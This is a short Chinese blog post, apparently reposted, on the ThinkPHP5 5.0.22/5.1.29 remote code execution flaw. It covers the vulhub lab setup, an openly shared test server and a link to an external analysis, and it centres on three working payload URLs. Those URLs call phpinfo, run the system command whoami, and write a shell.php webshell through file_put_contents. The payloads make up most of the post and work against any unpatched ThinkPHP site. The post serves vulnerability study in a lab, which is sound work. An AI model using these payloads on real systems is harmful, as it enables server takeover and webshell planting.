【环境学习】ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞

环境保留:2019.4.4-4.10

环境搭建:

                 这里我使用的是:vulhub

                 vulhub目录结构:vulhub/thinkphp/5-rcess

                 测试地址(开放一段时间供大家学习):http://bugbank.51vip.biz:29021

成因分析:

               Paper的这篇文章分析的很到位:https://paper.seebug.org/760/

payload演示:

              http://bugbank.51vip.biz:29021/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100

              http://bugbank.51vip.biz:29021/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

              http://bugbank.51vip.biz:29021/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=写入的文件内容url编码

扫描二维码关注公众号,回复: 5775897 查看本文章

 

猜你喜欢

转载自www.cnblogs.com/anbus/p/10654937.html
今日推荐